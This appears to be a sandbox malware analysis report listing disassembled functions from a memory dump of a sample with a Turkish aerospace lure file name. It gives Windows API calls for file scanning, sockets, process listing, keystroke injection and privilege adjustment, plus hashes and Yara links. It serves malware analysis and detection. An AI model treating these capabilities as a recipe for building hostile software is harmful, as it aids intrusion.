API ID: Window$Rectmouse_event$CursorDesktopForeground
String ID:
API String ID: 2387181109-0
Opcode ID: 27f5a3de6397e8d2a8988cfa41896fd1e0641b64b7991b0d3c99cf93ed64df23
Instruction ID: 4ee3f98c5c2fe09e2bd9f30bf6b0aa54d9802eba562c7b290871795d021130a8
Opcode Fuzzy Hash: 27f5a3de6397e8d2a8988cfa41896fd1e0641b64b7991b0d3c99cf93ed64df23
Instruction Fuzzy Hash: E6310072504346AFD720DF14D808B9BBBEAFF94314F10491AF984A7182DB34EA18CB92

Function 001F9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 001F9B78
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 001F9C8B

Part of subcall function 001F3874: GetInputState.USER32 ref: 001F38CB
Part of subcall function 001F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001F3966

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 001F9BA8
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 001F9C75

Strings

*.*, xrefs: 001F9B5D

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 33547dd3fd4a011f2c6b99e823b6083f74cf5345670cf46d5f157429a4011221
Instruction ID: a779cf163c71ee7577eff00769306be1609b7fb3c81ea6e7cd3c54237fd4e9bf
Opcode Fuzzy Hash: 33547dd3fd4a011f2c6b99e823b6083f74cf5345670cf46d5f157429a4011221
Instruction Fuzzy Hash: C8417C7194420EABCF14EF64C889BEEBBB8EF15310F244056E915A6191EB309F84CFA0

Function 00188060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON

Download Yara Rule

Strings

VUUU, xrefs: 001C5DF0
VUUU, xrefs: 001883FA
4100e14100514100514100d14100c14100214100c14100814100014100014100c14100c14100c14100c14100c14100c14100c14100c14100c14100c14100c14100, xrefs: 0018839B, 001883A6
ERCP, xrefs: 0018813C
VUUU, xrefs: 0018843C
VUUU, xrefs: 001883E8

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: 4100e14100514100514100d14100c14100214100c14100814100014100014100c14100c14100c14100c14100c14100c14100c14100c14100c14100c14100c14100$ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-3612016274
Opcode ID: 369587ffdfd2c7399f5f00952b872b793500e70f788e92d59c2c86ad808a465a
Instruction ID: a72e206837abffd59cdbaa8873cc7cb326fa7adc14bbad563a03d210336ba2c8
Opcode Fuzzy Hash: 369587ffdfd2c7399f5f00952b872b793500e70f788e92d59c2c86ad808a465a
Instruction Fuzzy Hash: 15A27071E0061ACBDF28DF58C940BADB7B2BF64314F6581A9E815A7285EB70DE81CF50

Function 0019997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON

Download Yara Rule

APIs

Part of subcall function 00199BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00199BB2

DefDlgProcW.USER32(?,?,?,?,?), ref: 00199A4E
GetSysColor.USER32(0000000F), ref: 00199B23
SetBkColor.GDI32(?,00000000), ref: 00199B36

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Color$LongProcWindow
String ID:
API String ID: 3131106179-0
Opcode ID: 88274ec89b2c551a81b534f97259713c9ee1c34d2fd7746c70ba15efe64dd483
Instruction ID: d67577f07338af63a793e5be7cb1fe33472081ab8d7a4a8d5c53dbffce310f4b
Opcode Fuzzy Hash: 88274ec89b2c551a81b534f97259713c9ee1c34d2fd7746c70ba15efe64dd483
Instruction Fuzzy Hash: 2EA10270208504BFEF28AA2C9C9DEBB3A9DEB56300B16420EF502D76D1EB259D51C676

Function 00201806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0020304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0020307A
Part of subcall function 0020304E: _wcslen.LIBCMT ref: 0020309B

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0020185D
WSAGetLastError.WSOCK32 ref: 00201884
bind.WSOCK32(00000000,?,00000010), ref: 002018DB
WSAGetLastError.WSOCK32 ref: 002018E6
closesocket.WSOCK32(00000000), ref: 00201915

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 81b7eb8df0c060e2f36d4e28304854e31995127922fcf1f1528fc67a3a9358e7
Instruction ID: b394a3b7251bd850423dacaf107e77161ff2e0058e49a589a2c1bf3ae76c4375
Opcode Fuzzy Hash: 81b7eb8df0c060e2f36d4e28304854e31995127922fcf1f1528fc67a3a9358e7
Instruction Fuzzy Hash: 10519275A00200AFEB11AF24D88AF6A77E5AB54718F14C09CFA155F3D3C771AE518BA1

Function 00211C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00211CC0
IsWindowEnabled.USER32 ref: 00211CCE
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00211CDB
IsIconic.USER32 ref: 00211CE9
IsZoomed.USER32 ref: 00211CF7

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 280d0305e706ad7b1af06eee081f725634e5d7cab1c1ecf8cca5b7c665832997
Instruction ID: e210b6ffe89eaba7ce7b137bfbcf196c60141aed2262bd87a45c498329b68325
Opcode Fuzzy Hash: 280d0305e706ad7b1af06eee081f725634e5d7cab1c1ecf8cca5b7c665832997
Instruction Fuzzy Hash: FE21F9317902015FD7208F1AD844B9A7BE5EFA5314F28806DE945CB351CB71DCA2CBD1

Function 001E8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 001E82AA

Strings

(, xrefs: 001E82F0
tb$, xrefs: 001E84F4
|, xrefs: 001E82DA

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: lstrlen
String ID: ($tb$$|
API String ID: 1659193697-4150371503
Opcode ID: 007a5b71ee376f31a9f556a1fc8cea6d29f83e0403e51f0b9e9fe84c99c13fc9
Instruction ID: a4c828f95b293aac8a4fd7b15375189c2f9726a512a4ef667beb760213ffb1af
Opcode Fuzzy Hash: 007a5b71ee376f31a9f556a1fc8cea6d29f83e0403e51f0b9e9fe84c99c13fc9
Instruction Fuzzy Hash: 95322774A00B459FCB28CF59C481A6AB7F1FF48710B15C56EE59ADB3A1EB70E981CB40

Function 0020A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0020A6AC
Process32FirstW.KERNEL32(00000000,?), ref: 0020A6BA

Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD

Process32NextW.KERNEL32(00000000,?), ref: 0020A79C
CloseHandle.KERNEL32(00000000), ref: 0020A7AB

Part of subcall function 0019CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,001C3303,?), ref: 0019CE8A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: d8b6292858a820f81ead60c6b9a6b32ddeb789a7e4faaedd133306666b65c30b
Instruction ID: 09fbcee08b1a410ac47121f88b69997bb4c90d5556275d40729c4f2f48899f3b
Opcode Fuzzy Hash: d8b6292858a820f81ead60c6b9a6b32ddeb789a7e4faaedd133306666b65c30b
Instruction Fuzzy Hash: 8B512D71508311AFD710EF24D886A6BBBE8FF99754F40891DF58997292EB30DA04CF92

Function 001EAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 001EAAAC
SetKeyboardState.USER32(00000080), ref: 001EAAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 001EAB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 001EAB88

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 0d1760404f281b3e62ac1689501df7cefdef98a5deb8a2f29d341d14400e495a
Instruction ID: 723985e74fb5c878c7f2ac180756ecbd099f1ba0d34544b982456ea648a210d2
Opcode Fuzzy Hash: 0d1760404f281b3e62ac1689501df7cefdef98a5deb8a2f29d341d14400e495a
Instruction Fuzzy Hash: 1B314C30A80BC8AEFF34CB66CC05BFE77AAAF54310F94421AF581961D0D774A985C762

Function 001FCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 001FCE89
GetLastError.KERNEL32(?,00000000), ref: 001FCEEA
SetEvent.KERNEL32(?,?,00000000), ref: 001FCEFE

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 7ef66ca697c6d20ace8c07bd77fefb099f7c3f9abbcfd479ae47e75f26f2f302
Instruction ID: c6c98f0329d69cdab6ca791a31d29d14ae0edd3f1f06b299f6956e80f63e8215
Opcode Fuzzy Hash: 7ef66ca697c6d20ace8c07bd77fefb099f7c3f9abbcfd479ae47e75f26f2f302
Instruction Fuzzy Hash: 3B21ACB554070D9BDB20CF65DA48BA6BBF8EB51314F20841AE64692152EB70EA04ABA0

Function 001B2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 001B271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 001B2724
UnhandledExceptionFilter.KERNEL32(?), ref: 001B2731

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: c64c504ac15165c7c096322021e05f125bc1801d4113bbe7779b77919ef9c8a7
Instruction ID: 7aa101c0cb5b4b08120874954da9f86d5dff0f4886abb6edc87e496668c3c8b4
Opcode Fuzzy Hash: c64c504ac15165c7c096322021e05f125bc1801d4113bbe7779b77919ef9c8a7
Instruction Fuzzy Hash: 4731D5749412289BCB21DF68DC887DCB7B8BF18310F5041EAE81CA7261EB309F858F44

Function 001F51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001F51DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001F5238
SetErrorMode.KERNEL32(00000000), ref: 001F52A1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 3f3421bd45defc52b201660972736ebbaf415c5006ec12faf9443bad80416b55
Instruction ID: 36ebe8e2457f9cd431d89bd3f8ef8e7fcb54009e98a29f32058c4685eb357fbb
Opcode Fuzzy Hash: 3f3421bd45defc52b201660972736ebbaf415c5006ec12faf9443bad80416b55
Instruction Fuzzy Hash: B9318175A00508DFDB00DF54D888EADBBB5FF09318F188099E909AB352CB31E945CFA0

Function 001E16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0019FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001A0668
Part of subcall function 0019FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 001A0685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001E170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001E173A
GetLastError.KERNEL32 ref: 001E174A

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: c0e1adb7f7f376700a4e8c784477d0383de38b49b12f29be8dc28026d3f16bb1
Instruction ID: 7191f583dd81a87cd517fe747df65336071576b1f44bba1018fb2c040c4b78e9
Opcode Fuzzy Hash: c0e1adb7f7f376700a4e8c784477d0383de38b49b12f29be8dc28026d3f16bb1
Instruction Fuzzy Hash: 6C1191B2814704BFD7189F54EC86DAFB7F9EB48B14B20852EE05697641EB70BC41CA20

Function 001ED5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001ED608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001ED645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001ED650

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 79a88f500601de242db829c531886a55f89a62bad903d9698cc2cd5b56392cd6
Instruction ID: 1c4c6098212aadc7ea0ad1c0dcb2d1551cfcce769aba1d67dc4591d980cb11e5
Opcode Fuzzy Hash: 79a88f500601de242db829c531886a55f89a62bad903d9698cc2cd5b56392cd6
Instruction Fuzzy Hash: E5117C75E41228BBDB108F95AC48FEFBBBCEB49B50F108111F914E7290C6704A018BA1

Function 001E1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001E168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001E16A1
FreeSid.ADVAPI32(?), ref: 001E16B1

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 2076edca5c3226a2498cfb403281cb2a5c4b7340093ae3ed6745e051214ce2c2
Instruction ID: 631b1fa67918001e7af65149d87ebd9d54c7c3742796dde18c712c80998a428a
Opcode Fuzzy Hash: 2076edca5c3226a2498cfb403281cb2a5c4b7340093ae3ed6745e051214ce2c2
Instruction Fuzzy Hash: E6F0F475990309FBDB00DFE49C89EAEBBBCFB08604F508565E501E2181E774AA448A50

Function 001A4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(001B28E9,?,001A4CBE,001B28E9,002488B8,0000000C,001A4E15,001B28E9,00000002,00000000,?,001B28E9), ref: 001A4D09
TerminateProcess.KERNEL32(00000000,?,001A4CBE,001B28E9,002488B8,0000000C,001A4E15,001B28E9,00000002,00000000,?,001B28E9), ref: 001A4D10
ExitProcess.KERNEL32 ref: 001A4D22

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 78694d6921f33ac3b3e456f51127eda8d3f441c9e221c4fab5db1700e141c3c4
Instruction ID: d98caa34f829828da21a9003fbf2637e9e4f7ef323963052f04a621388e07158
Opcode Fuzzy Hash: 78694d6921f33ac3b3e456f51127eda8d3f441c9e221c4fab5db1700e141c3c4
Instruction Fuzzy Hash: ADE0B639040248ABCF11AF94ED0DA987B69EBA6785B208054FD198A122DB75DE52CA80

Function 001BC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 001BC36C

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: 86a5109ef734e303400224d37550501931dbb4d7b46079ac629b5630bdf95258
Instruction ID: e7fb36ac63a9cc81a8400543893a37b84f1757c6bb4f73b84bcf099c3da1dda8
Opcode Fuzzy Hash: 86a5109ef734e303400224d37550501931dbb4d7b46079ac629b5630bdf95258
Instruction Fuzzy Hash: 544138765002196BCB209FB9DC88EFB77B8EB84314F5082A9F905C7180E7709D818B90

Function 001DD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 001DD28C

Strings

X64, xrefs: 001DD2A8

Memory Dump Source

Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

